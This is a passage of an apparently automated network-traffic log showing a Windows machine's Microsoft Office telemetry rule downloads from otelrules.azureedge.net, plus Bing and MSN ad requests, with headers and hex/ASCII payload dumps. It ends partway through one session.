                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                            x-ms-request-id: c2563176-701e-001e-70d5-3bf5e6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141740Z-178bfbc474btrnf9hC1NYCb80g00000001tg000000006fq1
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            83192.168.2.64979613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                            x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141742Z-1777c6cb7549x5qchC1TEBggbg0000000b5000000000nnaf
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            84192.168.2.64979513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                            x-ms-request-id: 9ca94d1e-301e-0000-0f9c-3beecc000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141742Z-1777c6cb754dqb2khC1TEBmk1s0000000b70000000007p87
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            85192.168.2.64979713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                            x-ms-request-id: 7df2b923-c01e-007a-2777-3bb877000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141742Z-1777c6cb754lv4cqhC1TEB13us0000000b5g00000000edz5
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            86192.168.2.64979813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                            x-ms-request-id: 2deeee2f-b01e-001e-4967-3b0214000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141742Z-178bfbc474bscnbchC1NYCe7eg00000001m000000000tufp
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            87192.168.2.64979913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:42 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                            x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141742Z-178bfbc474bv7whqhC1NYC1fg400000001eg00000000rx1f
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:43 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            88192.168.2.649803150.171.27.10443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:43 UTC732OUTGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8-rxPAXyoVMIT7WO3fmyzYDVUCUwhOSRqF271Ti6g8BWCwyjXBAKy25hyd8_CTi1NuSmCNn9qyOzRYARW9TPN7DuKIBWrrjD3U_Qy06pFM7ZfyYBTi3TahMjZz7hCNLrUqgNzT5cLK5_bmCHay2tVrl6XE609ivIJVvn1ki0CGUDKtf56%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3Db5427d1f27bf1c3838471a2067559285&TIME=20241121T141739Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            Host: g.bing.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:43 UTC864INHTTP/1.1 204 No Content
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                            Set-Cookie: MUID=30952A2DA9F56E753E2F3F13A8976F69; domain=.bing.com; expires=Tue, 16-Dec-2025 14:17:43 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                            Set-Cookie: MR=0; domain=g.bing.com; expires=Thu, 28-Nov-2024 14:17:43 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: A4FEADD8FA1A482FBF60A40CB8F76E6C Ref B: EWR311000105045 Ref C: 2024-11-21T14:17:43Z
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:43 GMT
                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            89192.168.2.64980220.223.35.26443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:43 UTC2591OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141737Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=132296fb9da74bb39fbb4e2f0c27504a&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-88000045&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1& [TRUNCATED]
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6
                                                                                                                                                                                                            X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            MS-CV: 7mKNM1Tl1UG+yoGB.0
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                                                                                                                                                            Host: arc.msn.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:43 UTC955INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Length: 2943
                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                            Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            ARC-RSP-DBG: [{"RADIDS":"1,P425116216-T1-C128000000001627409+B+P10+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}]
                                                                                                                                                                                                            X-ARC-SIG: ozdeZVT/O6dJPpOEvTU42PmHCQWR9lt9QCT/mizEHPf479uFm30+5NmSUcAdjMT5TEI/YsXrdeian4YgOFet5nfZIdwFvDz5ebLNRU/iX7E02SMMeVtF981Op0aOKO0x6KqMxj+OR1qu5px93+fgCdyW04VOAZOd0PNSoY14GgHQShpKqn2PHjGUE5ZsWTimknFKs/itV2/7y4kURlaZUjvxDjUYjHIE+OdRNqI2OdKJYEnGQANsCDIK1ZS4HAf1Z2h2nPA0Szzbok/XFjmPeCs6o9Ww7tz9gsqV36t0CLNJ8eD9xZIu98PRne58AixWcGn9tj3bNxxoj6GYsPufXw==
                                                                                                                                                                                                            Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:43 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:43 UTC2943INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69
                                                                                                                                                                                                            Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            90192.168.2.64980413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:44 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:44 UTC470INHTTP/1.1 200 OK
